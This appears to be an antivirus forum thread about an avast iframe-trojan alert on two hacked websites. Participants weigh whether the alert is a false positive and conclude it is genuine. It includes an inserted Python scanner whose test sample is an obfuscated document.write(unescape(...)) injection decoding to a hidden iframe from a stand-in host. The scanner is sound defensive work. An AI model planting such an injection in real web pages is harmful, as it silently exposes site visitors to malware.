HTML:IFrame-KT [Trj] False Positive?

The current Vps version (091207-0) detects the above trojan when opening this URL: hXXp://www.andiamovespa.nl

I’m told by people who are more knowledgeable than me, that this is a false positive. Can somebody please confirm this?

Thanks … Fogie

Hi Fogie, welcome to the forum :slight_smile:

Could you please modify your link to make it unclickable (i.e. change http to hXXp) to prevent others from potentially becoming infected.

This kind of detection is very common these days, with many ‘legitimate sites’ becoming hacked to distribute malware:

Every 3.6 seconds a website is infected

It seems that the data.js may have been hacked.

12/7/2009	4:11:57 PM	1260202317	SYSTEM	1404	Sign of "HTML:IFrame-KT [Trj]" has been found in "hXXp://www.andiamovespa.nl/data.js" file.

I cannot see it as it is obfuscated, but I would suggest that they do check it out, as it can be a potential risk.

Maybe someone else will have a better description.

-Scott-

Scott

Thanks for the quick reply.

The link has been edited.

Thanks for your analysis; we’ll see if someone comes up with something more definitive.

Fogie

Well, there is a whole page of obfuscated scripts trying to be loaded (hXXp://wXw.andiamovespa.nl/data.js), and that is what avast is alerting on, see image1.

Since it is obfuscated, I don’t understand its intentions, but avast has in the past been very accurate on these types of alerts.

See image2 to get an idea of the obfuscated scripts inside the data.js file which tries to load on opening the andiamovespa.nl home page.

So someone at the site needs to check out that data.js file, if it is in fact meant to be there.

David
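A defender-side way to triage a script like the data.js discussed above, added here as an example and not code from the original thread or from avast: a small scanner that flags hidden (zero-sized or invisible) iframes, common obfuscation wrappers such as document.write(unescape(...)), and script/iframe sources pointing off-site. The sample script, the site host "site.example" and the host "example.invalid" are constructed for the example.

```python
import re
from urllib.parse import unquote, urlparse

# Zero-sized or invisible iframes: the typical shape of an injected frame.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?(?:width\s*=\s*[\"']?0|height\s*=\s*[\"']?0|"
    r"visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>", re.I)
# Common obfuscation wrappers and long percent-encoded runs.
OBFUSCATION = re.compile(
    r"(?:eval|document\.write)\s*\(\s*(?:unescape|String\.fromCharCode)\s*\(|"
    r"(?:%[0-9a-f]{2}){20,}", re.I)
# Absolute src= attributes (script or iframe), to spot off-site loads.
SRC_ATTR = re.compile(r"\bsrc\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)

# Constructed sample: the kind of one-liner an attacker appends to a
# legitimate .js file; it decodes to a hidden iframe loading off-site.
SAMPLE_DATA_JS = (
    "document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2F"
    "example.invalid%2Fin.php%22%20width%3D0%20height%3D0%3E%3C%2F"
    "iframe%3E'));"
)
CLEAN_JS = "var m = document.getElementById('menu'); m.style.width = '100px';"


def scan_script(text, site_host):
    """Return unique (kind, detail) findings for a script body.

    One layer of percent-decoding approximates JavaScript's unescape()
    (it does not handle %uXXXX), so payloads hidden behind
    document.write(unescape(...)) are scanned in decoded form too.
    """
    findings = []
    for layer in (text, unquote(text)):
        for m in HIDDEN_IFRAME.finditer(layer):
            findings.append(("hidden_iframe", m.group(0)[:80]))
        for m in OBFUSCATION.finditer(layer):
            findings.append(("obfuscation", m.group(0)[:80]))
        for m in SRC_ATTR.finditer(layer):
            host = urlparse(m.group(1)).hostname or ""
            if host != site_host and not host.endswith("." + site_host):
                findings.append(("external_src", host))
    return list(dict.fromkeys(findings))  # dedupe, keep order


if __name__ == "__main__":
    for kind, detail in scan_script(SAMPLE_DATA_JS, "site.example"):
        print(f"{kind}: {detail}")
```

A script that trips several of these at once is worth pulling from the server and comparing against a known-good copy; a clean file returns no findings.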

Thanks for your input. I’ll see if I can get somebody to contact them (I don’t speak Dutch).

Fogie

The normal webmaster @ website name, etc., if that got through, should be fine in English, I would have thought, as HTML/JavaScript are English scripting languages. Not to mention the Dutch seem to have good multilingual skills.

A message to webmaster @ andiamovespa.nl bounced. I’ll see if I can find somebody who can read the home page.

Edited to disable the e-mail address

If you can, edit your post removing the email; whilst it bounced, it could still be harvested by a spambot trawling for email addresses. That is why I broke mine up.

Hi Fogie,

Probably they are cleaning: (Level: 1) Url checked: (script source)
hXtp://www.andiamovespa.nl/data.js
Blank page / could not connect
No ad codes identified

Not Found

The requested URL /data.js was not found on this server.

Apache/2.2 Server at wXw.andiamovespa.nl Port 80

polonus

Thanks for everybody’s interest, but I think this topic has been beaten to death. Somebody has said they’ll contact the site owner; so, let’s let this thread die.

Thanks again to all.

Edit: BTW, avast (with the same signature file) no longer detects the trojan.

Yes, because there is no call to the data.js file on the page and the data.js file is no longer on the server at that address.

I am getting this same supposed trojan from space.com :-\

Yes, it seems one of the PHP files has been hacked…

12/10/2009	11:37:07 PM	1260488227	SYSTEM	1492	Sign of "HTML:IFrame-KT [Trj]" has been found in "hXXp://www.space.com/common/js/community.php" file.

So this really isn’t a false positive? :o

Yes, it is most likely a genuine detection.

cool, seems the webmasters have fixed it ;D